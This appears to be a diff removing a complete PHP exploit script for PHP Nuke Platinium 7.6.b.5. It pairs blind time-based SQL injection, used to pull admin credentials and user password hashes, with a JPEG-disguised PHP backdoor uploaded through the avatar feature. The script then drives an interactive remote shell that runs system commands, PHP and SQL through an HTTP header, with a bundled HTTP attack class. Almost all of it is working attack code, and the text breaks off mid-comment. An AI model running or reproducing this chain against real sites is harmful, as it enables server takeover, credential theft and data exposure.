@@ -1,1264 +1,1264 @@ - -## Date: 02/07/08 -## -## Note -## **** -## I modified a bit phpsploit for this exploit, -## because PHP Nuke plays with REQUEST_URI var ... -## -## Requirements -## ************ -## register_globals=On -## -## phpreter -## ******** -## phpreter is really easy to use: -## You can change mode using "mode=", -## with = sql, php or cmd -## -## If you want to understand how it work ... -## read the code. -## -## You can take look to unchunk() function, because -## I think you were many with this problem ... -## - - -# -# Configuration -# - -$xpl = new phpsploit(); - -$xpl->agent('Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'); - -print "##\n"; -print "## PHP Nuke Platinium 7.6.b.5\n"; -print "## Remote Code Execution Exploit\n"; -print "## by Charles F. \n"; -print "## [http://realn.free.fr/]\n"; -print "##\n"; - -if($argc<3) -{ - print "##--- USAGE -----------------------------------------------\n"; - print "## [c:\]# php nuke_platinium_exploit.php [options]\n"; - print "##\n"; - print "## -url Target URL\n"; - print "## -shell If you only wan't to load again phpreter,\n"; - print "## specify with this param your shell URL\n"; - print "## -account A GOD admin account (optional)\n"; - print "## password can be md5 or plain text\n"; - print "## user:passwd\n"; - print "## -bmark How many time must pass to consider SQL\n"; - print "## returned true (in seconds) and how many\n"; - print "## operations you want SQL to do (optional)\n"; - print "## default: 4:6000000\n"; - print "##\n"; - print "## eg:\n"; - print "## ./exploit.php -url http://target.net/ -bmark 5:4000000\n"; - print "## ./exploit.php -url http://target.net/ -admin god:pwd\n"; - print "## ./exploit.php -shell http://target.net/tmp_1339.php\n"; - print "##---------------------------------------------------------\n"; - exit(); -} - -# Parameters - -$url = getparam('url'); -$shell_url = getparam('shell'); -$account = getparam('account') ? 
getparam('account') : ''; -$bmark = getparam('bmark') ? getparam('bmark') : '4:6000000'; - -list($bmark_time, $bmark_numb) = explode(':', $bmark); - -if(!$url && !$shell_url) -{ - print "## Ok dude, are you an idiot ?\n"; - exit(); -} - -# SQL Configuration for phpreter - -$sql = array( - 'config.php', - '$dbhost', - '$dbuname', - '$dbpass', - '$dbname', -); - -if($shell_url) -{ - print "##--- SHELL -----------------------------------------------\n"; - print "## URL: $shell_url\n"; - print "##---------------------------------------------------------\n"; - - $shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false); - - exit(); -} - -if(!preg_match('#ORDER by date#',$xpl->post($url.'includes/pdf.php',"what=getpdf&table=_blocked_iplist '-"))) -{ - print "## register_globals=Off, exiting.\n"; - print "##\n"; - exit(); -} - -# -# Admin credentials -# - -if(!empty($account)) -{ - list($aid, $pwd) = explode(':',$account); - if(!preg_match('#[a-f0-9]{32}#i',$pwd)) $pwd = md5($pwd); -} - -print "##--- ADMIN -----------------------------------------------\n"; - -print "## Admin ID: "; -isset($aid) ? print $aid."\n" : $aid = bmark('aid','abcdefghijklmnopqrstuvwxyz0123456789'); - -print "## Password: "; -isset($pwd) ? 
print $pwd."\n" : $pwd = bmark('pwd','abcdef0123456789'); - -print "##---------------------------------------------------------\n"; -print "##\n"; - -# -# User data -# - -# We set up admin access - -$c_admin = base64_encode($aid.':'.$pwd); -$xpl->addcookie('admin', urlencode($c_admin)); - -# Ok, now, we need an user for the upload - -$query = "SELECT CONCAT(0x3a3a3a,user_id,0x3a,username,0x3a,user_email,0x3a,user_password,0x3a3a3a) FROM nuke_users ORDER BY user_id DESC LIMIT 1"; -$data = sqlexec($query); - -$data = explode(':::',$data); -list($user_id, $user_name, $user_mail, $user_pwd) = explode(':',$data[1]); - -$c_user = base64_encode($user_id.':'.$user_name.':'.$user_pwd); -$xpl->addcookie('user', urlencode($c_user)); - -# We need a valid SID -$xpl->get($url.'modules.php?name=Forums&file=profile&mode=editprofile'); -preg_match('#sid" value="([a-f0-9]{32})#i', $xpl->getcontent(), $c_sid); - -$c_sid = $c_sid[1]; -$xpl->addcookie('_sid',$c_sid); - -print "##--- USER ------------------------------------------------\n"; -print "## User ID : ".$user_id."\n"; -print "## Name : ".$user_name."\n"; -print "## Mail : ".$user_mail."\n"; -print "## Password: ".$user_pwd."\n"; -print "##---------------------------------------------------------\n"; -print "##\n"; - -# -# Cookies -# - -print "##--- COOKIES -----------------------------------\n"; -print "## user=".$c_user."\n"; -print "## admin=".$c_admin."\n"; -print "##---------------------------------------------------------\n"; -print "##\n"; - -# -# File upload -# - -print "## Uploading the file "; -$rand_filename = 'tmp_'.rand().'.php'; - -# Step #1: avatar_path='w00t.php\0' -sqlexec("UPDATE nuke_bbconfig SET config_value='$rand_filename\\0' WHERE config_name='avatar_path'"); -print "."; - -# Step #2: JPEG upload (bypassing restrictions) - -# $c0de contains as a jpeg comment -# print '-:-';eval(stripslashes($_SERVER['HTTP_SHELL']));print '-:-'; -# -# To people who is laughing to me when I stripslashes() the header: -# On 
specifics servers, HTTP headers are addslashed. -# This gave, in fact, the attack #2 in my Nuked-Klan sploit. -# -$c0de = "" -. "\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x60" -. "\x00\x60\x00\x00\xff\xdb\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08" -. "\x07\x07\x07\x09\x09\x08\x0a\x0c\x14\x0d\x0c\x0b\x0b\x0c\x19\x12" -. "\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20" -. "\x22\x2c\x23\x1c\x1c\x28\x37\x29\x2c\x30\x31\x34\x34\x34\x1f\x27" -. "\x39\x3d\x38\x32\x3c\x2e\x33\x34\x32\xff\xdb\x00\x43\x01\x09\x09" -. "\x09\x0c\x0b\x0c\x18\x0d\x0d\x18\x32\x21\x1c\x21\x32\x32\x32\x32" -. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\xff\xfe" -. "\x00\x4e\x3c\x3f\x70\x68\x70\x20\x70\x72\x69\x6e\x74\x20\x27\x2d" -. "\x3a\x2d\x27\x3b\x65\x76\x61\x6c\x28\x73\x74\x72\x69\x70\x73\x6c" -. "\x61\x73\x68\x65\x73\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x27" -. "\x48\x54\x54\x50\x5f\x53\x48\x45\x4c\x4c\x27\x5d\x29\x29\x3b\x70" -. "\x72\x69\x6e\x74\x20\x27\x2d\x3a\x2d\x27\x3b\x20\x3f\x3e\xff\xc0" -. "\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11" -. "\x01\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00" -. "\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09" -. "\x0a\x0b\xff\xc4\x00\xb5\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05" -. "\x05\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21" -. "\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23" -. "\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17" -. "\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a" -. "\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a" -. "\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a" -. "\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99" -. 
"\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7" -. "\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5" -. "\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1" -. "\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xc4\x00\x1f\x01\x00\x03" -. "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01" -. "\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\xff\xc4\x00\xb5\x11\x00" -. "\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00" -. "\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13" -. "\x22\x32\x81\x08\x14\x42\x91\xa1\xb1\xc1\x09\x23\x33\x52\xf0\x15" -. "\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25\xf1\x17\x18\x19\x1a\x26\x27" -. "\x28\x29\x2a\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49" -. "\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69" -. "\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x82\x83\x84\x85\x86\x87\x88" -. "\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6" -. "\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4" -. "\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2" -. "\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9" -. "\xfa\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf7" -. 
"\xfa\x28\xa2\x80\x3f\xff\xd9\xd9"; - -$data = array( - frmdt_url => $url.'modules.php?name=Forums&file=profile', - 'avatar' => array(frmdt_filename => '1.jpg', frmdt_type => 'image/jpeg', frmdt_content => $c0de), - 'username' => $user_name, 'email' => $user_mail, - 'cur_password' => '', 'new_password' => '', - 'password_confirm' => '', 'icq' => '', - 'aim' => '', 'msn' => '', - 'yim' => '', 'website' => '', - 'location' => '', 'occupation' => '', - 'interests' => '', 'b_day' => '1', - 'b_md' => '1', 'b_year' => '1111', - 'gender' => '1', 'viewemail' => '0', - 'hideonline' => '1', 'notifyreply' => '0', - 'notifypm' => '0', 'popup_pm' => '0', - 'attachsig' => '1', 'allowbbcode' => '1', - 'allowhtml' => '1', 'allowsmilies' => '1', - 'showquickreply' => '0', 'user_wordwrap' => '70', - 'language' => 'english', 'style' => '1', - 'timezone' => '-6', 'dateformat' => 'Y-m-d, H:i:s', - 'MAX_FILE_SIZE' => '99999', 'avatarurl' => '', - 'avatarremoteurl' => '', 'mode' => 'editprofile', - 'agreed' => 'true', 'coppa' => '0', - 'sid' => $c_sid, 'user_id' => $user_id, - 'current_email' => $user_mail, 'submit' => 'Submit', -); - -$xpl->formdata($data); -print "."; - -# Step #3: avatar_path='modules/Forums/images/avatars' -sqlexec("UPDATE nuke_bbconfig SET config_value='modules/Forums/images/avatars' WHERE config_name='avatar_path'"); -print ".\n"; - -# Shell is uploaded, let's load it - -$shell_url = $url.$rand_filename; - -print "##\n"; -print "##--- SHELL -----------------------------------------------\n"; -print "## URL: $shell_url\n"; -print "##---------------------------------------------------------\n"; - -$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false); - -# -# Execute SQL Queries -# -function sqlexec($query) -{ - global $xpl,$url; - - $xpl->post($url.'modules/Forums/admin/admin_genesismyadmin.php','this_query='.urlencode($query).'&submit=&with_selected=optimize'); - - return $xpl->getcontent(); -} - -# -# Bmark SQL Injection Function -# -function 
bmark($query,$charset) -{ - global $xpl,$url,$data,$bmark_time,$bmark_numb; - - $d=0; $v='';$max=32; - - $query = 'SELECT '.$query.' FROM nuke_authors WHERE radminsuper=1 ORDER BY aid LIMIT 1'; - - $data = "what=getpdf&table=_blocked_iplist+WHERE+IF((),BENCHMARK($bmark_numb,MD5(0x616161)),1)=1 --"; - - while($d<$max) - { - $d++; - for($z=0;$zpost($url."includes/pdf.php", str_replace('',$sql,$data) ); - - if(time()-$date>$bmark_time) - { - print strtolower(chr($f)); - $v .= chr($f); - break; - } - } - if(strlen($v)==$save) break; - $save = strlen($v); - } - - print "\n"; - return $v; -} - -function getparam($param,$opt='') -{ - global $argv; - foreach($argv as $value => $key) - { - if($key == '-'.$param) return $argv[$value+1]; - } - if($opt) exit("\n-$param parameter required"); - else return; -} - - -/* - * Copyright (c) real - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - * - * TITLE: PHPreter - * AUTHOR: Charles "real" F. - * VERSION: 1.0 - * LICENSE: GNU General Public License - * - * This is a really simple class with permits to exec SQL, PHP or CMD - * on a remote host using the HTTP "Shell" header. 
- * - */ - -class phpreter -{ - var $url; - var $host; - var $port; - var $page; - - var $mode; - - var $ssql; - - var $prompt; - var $phost; - - var $regex; - var $data; - - /** - * __construct() - * - * @param url The url of the remote shell. - * @param regexp The regex to catch cmd result. - * @param mode Mode: php, sql or cmd. - * @param sql An array with the file to include, - * and sql vars - * @param clear Determines if clear() is called - * on startup - */ - function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true) - { - $this->url = $url; - - $this->regex = '#'.$regexp.'#is'; - - # - # Set important data - # - - $infos = parse_url($this->url); - $this->host = $infos['host']; - $this->port = isset($infos['port']) ? $infos['port'] : 80; - $this->page = $infos['path']; - unset($infos); - - # www.(site).com - $host_tmp = explode('.',$this->host); - $this->phost = $host_tmp[ count($host_tmp)-2 ]; - unset($host_tmp); - - # - # Set up MySQL connection string - # - if(!sizeof($sql)) $this->ssql = ''; - elseif(sizeof($sql)==5) - { - $this->ssql = "include('$sql[0]');" - . "mysql_connect($sql[1], $sql[2], $sql[3]);" - . "mysql_select_db($sql[4]);"; - } - else - { - $this->ssql = "" - . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');" - . "mysql_select_db('$sql[3]');"; - } - - $this->setmode($mode); - - # - # Main Loop - # - - if($clear) $this->clear(); - print $this->prompt; - - while(!preg_match('#^(quit|exit|close)$#i',($cmd = trim(fgets(STDIN))))) - { - # change mode - if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) $this->setmode($array[3]); - - # clear data - elseif(preg_match('#^clear$#i',$cmd)) $this->clear(); - - # else - else print $this->exec($cmd); - - print $this->prompt; - } - } - - /** - * clear() - * Just clears ouput, printing '\n'x50 - */ - function clear() - { - print str_repeat("\n",50); - return 0; - } - - /** - * setmode() - * Set mode (PHP, CMD, SQL) - * You don't have to call it. 
- * use mode=[php|cmd|sql] instead, - * in the prompt. - */ - function setmode($newmode) - { - $this->mode = strtolower($newmode); - $this->prompt = '['.$this->phost.']['.$this->mode.']# '; - - switch($this->mode) - { - case 'cmd': - $this->data = 'system(\'\');'; - break; - case 'php': - $this->data = ''; - break; - case 'sql': - $this->data = $this->ssql - . '$q = mysql_query(\'\') or print(mysql_error());' - . 'print str_repeat("-",50)."\n";' - . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))' - . '{' - . 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";' - . 'print str_repeat("-",50)."\n";' - . '}'; - break; - } - return $this->mode; - } - - /** - * exec() - * Execute any query and catch the result. - * You don't have to call it. - */ - function exec($cmd) - { - if(!strlen($this->data)) $shell = $cmd; - else $shell = str_replace('',addslashes($cmd),$this->data); - - $fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30); - - $req = "GET ".$this->page." HTTP/1.1\r\n"; - $req .= "Host: ". $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) ."\r\n"; - $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; - $req .= "Shell: $shell\r\n"; - $req .= "Content-transfert-encoding: base64\r\n"; - $req .= "Connection: close\r\n\r\n"; - - unset($shell); - - fputs($fp,$req); - - $content = ''; - while(!feof($fp)) $content .= fgets($fp,128); - - fclose($fp); - - # Remove headers - $data = explode("\r\n\r\n",$content); - array_shift($data); - $content = implode("\r\n\r\n",$data); - - $content = $this->unchunk($content); - - preg_match($this->regex,$content,$data); - - if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n"; - - return $data[1]; - } - - /** - * unchunk() - * This function aims to remove chunked content sizes which - * are putted by apache server when it uses chunked - * transfert-encoding. 
- */ - function unchunk($data) - { - $dsize = 1; - $offset = 0; - - while($dsize>0) - { - $hsize_size = strpos($data, "\r\n", $offset) - $offset; - - $hsize = substr($data, $offset, $hsize_size); - $dsize = hexdec($hsize); - - /* - print "offset (dec) = $offset\n"; - print "hsize (hex) = $hsize\n"; - print "dsize (dec) = $dsize\n"; - print "crlfp (dec) = $hsize_size\n"; - print "--\n"; - */ - - # Remove $hsize\r\n from $data - $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); - - $offset += $dsize; - - # Remove the \r\n before the next $hsize - $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); - } - - return $data; - } -} - -/* - * - * Copyright (C) darkfig - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - * - * TITLE: PhpSploit Class - * REQUIREMENTS: PHP 4 / PHP 5 - * VERSION: 2.0 - * LICENSE: GNU General Public License - * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt - * FILENAME: phpsploitclass.php - * - * CONTACT: gmdarkfig@gmail.com (french / english) - * GREETZ: Sparah, Ddx39 - * - * DESCRIPTION: - * The phpsploit is a class implementing a web user agent. - * You can add cookies, headers, use a proxy server with (or without) a - * basic authentification. It supports the GET and the POST method. 
It can - * also be used like a browser with the cookiejar() function (which allow - * a server to add several cookies for the next requests) and the - * allowredirection() function (which allow the script to follow all - * redirections sent by the server). It can return the content (or the - * headers) of the request. Others useful functions can be used for debugging. - * A manual is actually in development but to know how to use it, you can - * read the comments. - * - * CHANGELOG: - * - * [2007-06-10] (2.0) - * * Code: Code optimization - * * New: Compatible with PHP 4 by default - * - * [2007-01-24] (1.2) - * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) - * * New: multipart/form-data enctype is now supported - * - * [2006-12-31] (1.1) - * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) - * * New: You can now call the getheader() / getcontent() function without parameters - * - * [2006-12-30] (1.0) - * * First version - * - */ - -class phpsploit -{ - var $proxyhost; - var $proxyport; - var $host; - var $path; - var $port; - var $method; - var $url; - var $packet; - var $proxyuser; - var $proxypass; - var $header; - var $cookie; - var $data; - var $boundary; - var $allowredirection; - var $last_redirection; - var $cookiejar; - var $recv; - var $cookie_str; - var $header_str; - var $server_content; - var $server_header; - - - /** - * This function is called by the - * get()/post()/formdata() functions. - * You don't have to call it, this is - * the main function. 
- * - * @access private - * @return string $this->recv ServerResponse - * - */ - function sock() - { - if(!empty($this->proxyhost) && !empty($this->proxyport)) - $socket = @fsockopen($this->proxyhost,$this->proxyport); - else - $socket = @fsockopen($this->host,$this->port); - - if(!$socket) - die("Error: Host seems down"); - - # modification (by real) - preg_match("#^http://[^/]+(/.*)$#i", $this->url, $tmp); - $tmp = $tmp[1]; - - if($this->method=='get') - $this->packet = 'GET '.$tmp." HTTP/1.1\r\n"; - - elseif($this->method=='post' or $this->method=='formdata') - $this->packet = 'POST '.$tmp." HTTP/1.1\r\n"; - - else - die("Error: Invalid method"); - - if(!empty($this->proxyuser)) - $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; - - if(!empty($this->header)) - $this->packet .= $this->showheader(); - - if(!empty($this->cookie)) - $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; - - $this->packet .= 'Host: '.$this->host."\r\n"; - $this->packet .= "Connection: Close\r\n"; - - if($this->method=='post') - { - $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data."\r\n"; - } - elseif($this->method=='formdata') - { - $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data; - } - - $this->packet .= "\r\n"; - $this->recv = ''; - - fputs($socket,$this->packet); - - while(!feof($socket)) - $this->recv .= fgets($socket); - - fclose($socket); - - if($this->cookiejar) - $this->getcookie(); - - if($this->allowredirection) - return $this->getredirection(); - else - return $this->recv; - } - - - /** - * This function allows you to add several - * cookies in the request. 
- * - * @access public - * @param string cookn CookieName - * @param string cookv CookieValue - * @example $this->addcookie('name','value') - * - */ - function addcookie($cookn,$cookv) - { - if(!isset($this->cookie)) - $this->cookie = array(); - - $this->cookie[$cookn] = $cookv; - } - - - /** - * This function allows you to add several - * headers in the request. - * - * @access public - * @param string headern HeaderName - * @param string headervalue Headervalue - * @example $this->addheader('Client-IP', '128.5.2.3') - * - */ - function addheader($headern,$headervalue) - { - if(!isset($this->header)) - $this->header = array(); - - $this->header[$headern] = $headervalue; - } - - - /** - * This function allows you to use an - * http proxy server. Several methods - * are supported. - * - * @access public - * @param string proxy ProxyHost - * @param integer proxyp ProxyPort - * @example $this->proxy('localhost',8118) - * @example $this->proxy('localhost:8118') - * - */ - function proxy($proxy,$proxyp='') - { - if(empty($proxyp)) - { - $proxarr = explode(':',$proxy); - $this->proxyhost = $proxarr[0]; - $this->proxyport = (int)$proxarr[1]; - } - else - { - $this->proxyhost = $proxy; - $this->proxyport = (int)$proxyp; - } - - if($this->proxyport > 65535) - die("Error: Invalid port number"); - } - - - /** - * This function allows you to use an - * http proxy server which requires a - * basic authentification. 
Several - * methods are supported: - * - * @access public - * @param string proxyauth ProxyUser - * @param string proxypass ProxyPass - * @example $this->proxyauth('user','pwd') - * @example $this->proxyauth('user:pwd'); - * - */ - function proxyauth($proxyauth,$proxypass='') - { - if(empty($proxypass)) - { - $posvirg = strpos($proxyauth,':'); - $this->proxyuser = substr($proxyauth,0,$posvirg); - $this->proxypass = substr($proxyauth,$posvirg+1); - } - else - { - $this->proxyuser = $proxyauth; - $this->proxypass = $proxypass; - } - } - - - /** - * This function allows you to set - * the 'User-Agent' header. - * - * @access public - * @param string useragent Agent - * @example $this->agent('Firefox') - * - */ - function agent($useragent) - { - $this->addheader('User-Agent',$useragent); - } - - - /** - * This function returns the headers - * which will be in the next request. - * - * @access public - * @return string $this->header_str Headers - * @example $this->showheader() - * - */ - function showheader() - { - $this->header_str = ''; - - if(!isset($this->header)) - return; - - foreach($this->header as $name => $value) - $this->header_str .= $name.': '.$value."\r\n"; - - return $this->header_str; - } - - - /** - * This function returns the cookies - * which will be in the next request. - * - * @access public - * @return string $this->cookie_str Cookies - * @example $this->showcookie() - * - */ - function showcookie() - { - $this->cookie_str = ''; - - if(!isset($this->cookie)) - return; - - foreach($this->cookie as $name => $value) - $this->cookie_str .= $name.'='.$value.'; '; - - return $this->cookie_str; - } - - - /** - * This function returns the last - * formed http request. 
- * - * @access public - * @return string $this->packet HttpPacket - * @example $this->showlastrequest() - * - */ - function showlastrequest() - { - if(!isset($this->packet)) - return; - else - return $this->packet; - } - - - /** - * This function sends the formed - * http packet with the GET method. - * - * @access public - * @param string url Url - * @return string $this->sock() - * @example $this->get('localhost/index.php?var=x') - * @example $this->get('http://localhost:88/tst.php') - * - */ - function get($url) - { - $this->target($url); - $this->method = 'get'; - return $this->sock(); - } - - - /** - * This function sends the formed - * http packet with the POST method. - * - * @access public - * @param string url Url - * @param string data PostData - * @return string $this->sock() - * @example $this->post('http://localhost/','helo=x') - * - */ - function post($url,$data) - { - $this->target($url); - $this->method = 'post'; - $this->data = $data; - return $this->sock(); - } - - - /** - * This function sends the formed http - * packet with the POST method using - * the multipart/form-data enctype. 
- * - * @access public - * @param array array FormDataArray - * @return string $this->sock() - * @example $formdata = array( - * frmdt_url => 'http://localhost/upload.php', - * frmdt_boundary => '123456', # Optional - * 'var' => 'example', - * 'file' => array( - * frmdt_type => 'image/gif', # Optional - * frmdt_transfert => 'binary' # Optional - * frmdt_filename => 'hello.php, - * frmdt_content => '')); - * $this->formdata($formdata); - * - */ - function formdata($array) - { - $this->target($array[frmdt_url]); - $this->method = 'formdata'; - $this->data = ''; - - if(!isset($array[frmdt_boundary])) - $this->boundary = 'phpsploit'; - else - $this->boundary = $array[frmdt_boundary]; - - foreach($array as $key => $value) - { - if(!preg_match('#^frmdt_(boundary|url)#',$key)) - { - $this->data .= str_repeat('-',29).$this->boundary."\r\n"; - $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; - - if(!is_array($value)) - { - $this->data .= "\r\n\r\n".$value."\r\n"; - } - else - { - $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; - - if(isset($array[$key][frmdt_type])) - $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; - - if(isset($array[$key][frmdt_transfert])) - $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; - - $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; - } - } - } - - $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; - return $this->sock(); - } - - - /** - * This function returns the content - * of the server response, without - * the headers. 
- * - * @access public - * @param string code ServerResponse - * @return string $this->server_content - * @example $this->getcontent() - * @example $this->getcontent($this->get('http://localhost/')) - * - */ - function getcontent($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_content = ''; - - for($i=1;$iserver_content .= $code[$i]; - - return $this->server_content; - } - - - /** - * This function returns the headers - * of the server response, without - * the content. - * - * @access public - * @param string code ServerResponse - * @return string $this->server_header - * @example $this->getcontent() - * @example $this->getcontent($this->post('http://localhost/','1=2')) - * - */ - function getheader($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_header = $code[0]; - - return $this->server_header; - } - - - /** - * This function is called by the - * cookiejar() function. It adds the - * value of the "Set-Cookie" header - * in the "Cookie" header for the - * next request. You don't have to - * call it. - * - * @access private - * @param string code ServerResponse - * - */ - function getcookie() - { - foreach(explode("\r\n",$this->getheader()) as $header) - { - if(preg_match('/set-cookie/i',$header)) - { - $fequal = strpos($header,'='); - $fvirgu = strpos($header,';'); - - // 12=strlen('set-cookie: ') - $cname = substr($header,12,$fequal-12); - $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); - - $this->cookie[trim($cname)] = trim($cvalu); - } - } - } - - - /** - * This function is called by the - * get()/post() functions. You - * don't have to call it. 
- * - * @access private - * @param string urltarg Url - * @example $this->target('http://localhost/') - * - */ - function target($urltarg) - { - if(!ereg('^http://',$urltarg)) - $urltarg = 'http://'.$urltarg; - - $urlarr = parse_url($urltarg); - $this->url = 'http://'.$urlarr['host'].$urlarr['path']; - - if(isset($urlarr['query'])) - $this->url .= '?'.$urlarr['query']; - - $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; - $this->host = $urlarr['host']; - - if($this->port != '80') - $this->host .= ':'.$this->port; - - if(!isset($urlarr['path']) or empty($urlarr['path'])) - die("Error: No path precised"); - - $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); - - if($this->port > 65535) - die("Error: Invalid port number"); - } - - - /** - * If you call this function, - * the script will extract all - * 'Set-Cookie' headers values - * and it will automatically add - * them into the 'Cookie' header - * for all next requests. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->cookiejar(0) - * @example $this->cookiejar(1) - * - */ - function cookiejar($code) - { - if($code=='0') - $this->cookiejar=FALSE; - - elseif($code=='1') - $this->cookiejar=TRUE; - } - - - /** - * If you call this function, - * the script will follow all - * redirections sent by the server. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->allowredirection(0) - * @example $this->allowredirection(1) - * - */ - function allowredirection($code) - { - if($code=='0') - $this->allowredirection=FALSE; - - elseif($code=='1') - $this->allowredirection=TRUE; - } - - - /** - * This function is called if - * allowredirection() is enabled. - * You don't have to call it. 
